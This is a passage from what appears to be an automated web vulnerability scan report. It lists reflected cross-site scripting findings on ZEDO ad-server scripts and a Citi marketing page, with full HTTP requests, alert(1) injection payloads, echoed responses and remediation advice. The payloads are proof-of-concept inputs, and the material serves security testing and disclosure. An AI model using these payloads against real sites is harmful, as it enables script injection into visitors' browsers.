Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='ed98c";alert(1)//2c617412c80';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=ed98c";alert(1)//2c617412c80;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.88. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44fa'%3balert(1)//438e80c48dc was submitted in the q parameter. This input was echoed as f44fa';alert(1)//438e80c48dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=f44fa'%3balert(1)//438e80c48dc&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='f44fa';alert(1)//438e80c48dc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=f44fa';alert(1)//438e80c48dc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.89. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38718"%3balert(1)//62cf392d211 was submitted in the $ parameter. This input was echoed as 38718";alert(1)//62cf392d211 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=38718"%3balert(1)//62cf392d211&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:38718";alert(1)//62cf392d211;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',38718";alert(1)//62cf392d211';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,38718";alert(1)//62cf392d211;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.90. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aa1'%3balert(1)//71dd49f8f74 was submitted in the $ parameter. This input was echoed as 98aa1';alert(1)//71dd49f8f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=98aa1'%3balert(1)//71dd49f8f74&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:98aa1';alert(1)//71dd49f8f74;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',98aa1';alert(1)//71dd49f8f74';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,98aa1';alert(1)//71dd49f8f74;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce34c'-alert(1)-'2c607e7cd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?ce34c'-alert(1)-'2c607e7cd20=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 986
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=403
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:11 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fmr.js;qs=ce34c'-alert(1)-'2c607e7cd20=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.92. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb1'%3balert(1)//8a1d92bd133 was submitted in the q parameter. This input was echoed as c7cb1';alert(1)//8a1d92bd133 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=c7cb1'%3balert(1)//8a1d92bd133&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='c7cb1';alert(1)//8a1d92bd133';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c7cb1';alert(1)//8a1d92bd133;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.93. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2059a"%3balert(1)//3c744e65e36 was submitted in the q parameter. This input was echoed as 2059a";alert(1)//3c744e65e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=2059a"%3balert(1)//3c744e65e36&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='2059a";alert(1)//3c744e65e36';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=2059a";alert(1)//3c744e65e36;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.94. http://citi.bridgetrack.com/cbol/10/tiered_checking/default.htm [CMP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /cbol/10/tiered_checking/default.htm

Issue detail

The value of the CMP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87dce'%3balert(1)//cd49a21da3a was submitted in the CMP parameter. This input was echoed as 87dce';alert(1)//cd49a21da3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

